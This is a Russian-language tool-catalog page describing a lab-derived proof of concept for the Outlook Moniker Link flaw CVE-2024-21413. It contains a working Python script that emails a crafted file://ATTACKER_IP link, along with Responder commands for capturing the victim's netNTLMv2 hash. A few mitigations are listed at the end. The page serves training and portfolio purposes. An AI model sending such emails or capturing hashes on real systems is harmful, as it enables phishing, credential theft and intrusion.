Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Email-exploit-Moniker-Link-CVE-2024-21413- | Kitploit
Инструменты/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
Взлом паролейЭксплуатацияФишингСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingБезопасность Электронной ПочтыЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubyass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

Репозиторий
11 месяцев назадЕщё не проверено

Email-эксплойт Moniker Link-CVE-2024-21413-Module — Документация

Обзор: Практический PoC, демонстрирующий использование Moniker Link в HTML-письме для инициирования SMB-подключения из Outlook, что позволяет перехватить netNTLMv2-хэш жертвы с помощью Responder. Это демонстрирует практические навыки в области пентеста, написания скриптов и анализа сетевых протоколов.


Демонстрируемые ключевые навыки

  • Написание Python-скриптов для автоматизированной отправки писем
  • Понимание протоколов SMB, NTLMv2, LLMNR, NBT-NS и MDNS
  • Настройка Responder и мониторинг для перехвата хэшей
  • Диагностика проблем с сетевой/DNS-конфигурацией Linux
  • Создание контролируемого сценария наступательной безопасности в лабораторной среде

Порядок работы PoC

  1. Настройка SMB-слушателя: Запустите Responder на атакующей машине для мониторинга попыток SMB-аутентификации.
  2. Отправка подготовленного письма: Используйте Python-скрипт для доставки HTML-письма с Moniker Link (file://), указывающим на SMB-ресурс атакующего.
  3. Перехват хэша: Когда жертва нажимает на ссылку, Outlook пытается получить файл по SMB, а Responder перехватывает netNTLMv2-хэш.

Минимальный эксплойт-скрипт

root@kitploit:~
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')

Подсказка: Замените ATTACKER_IP и mailserver перед запуском. В лаборатории TryHackMe пароль — attacker.


Запуск Responder

root@kitploit:~
responder -I ens5

Замените ens5 на имя вашего сетевого интерфейса.


Устранение неполадок /etc/resolv.conf

Иногда Responder не работает из-за повреждённых символических ссылок в /etc/resolv.conf. Исправление:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

Выделяемые навыки: диагностика Linux, настройка DNS и адаптация инструментов для облачных/VM-сред.


Скриншоты прогресса

  1. Ошибка / проблема с resolv.conf:` Error Resolv.conf

  2. Применённое исправление DNS: DNS Setup Fix

  3. Python-скрипт для письма: Python Email Script

  4. Доставка эксплойта: Exploit Delivery

  5. Входящие жертвы: Victim Email

  6. Перехваченный хэш жертвы: Captured Victim Hash


Используемые инструменты и команды

  • Responder: слушатель SMB/LLMNR/NBT-NS/MDNS
  • Python3: выполнение PoC-скрипта отправки письма
  • smtplib / email.mime: библиотеки Python для создания и отправки писем
  • Команды Linux shell для диагностики DNS

Полученные навыки / Основное для портфолио

  • Моделирование сетевых атак и процесс эксплуатации
  • Автоматизация вектора социальной инженерии (письмо с Moniker Link)
  • Перехват и анализ хэшей netNTLMv2
  • Междисциплинарная диагностика: Python, сети, взаимодействие Windows и Linux
  • Документирование и представление процесса для технических рецензентов

Меры защиты и рекомендации по обороне

  • Отключите автоматическую загрузку внешнего содержимого в Outlook
  • Блокируйте исходящий SMB в недоверенные сети
  • Включите подпись SMB и современные политики аутентификации на Windows-клиентах

Атрибуция

Адаптировано из лаборатории TryHackMe MonikerLink и оригинального PoC от CMNatic (GitHub)

Скачать инструмент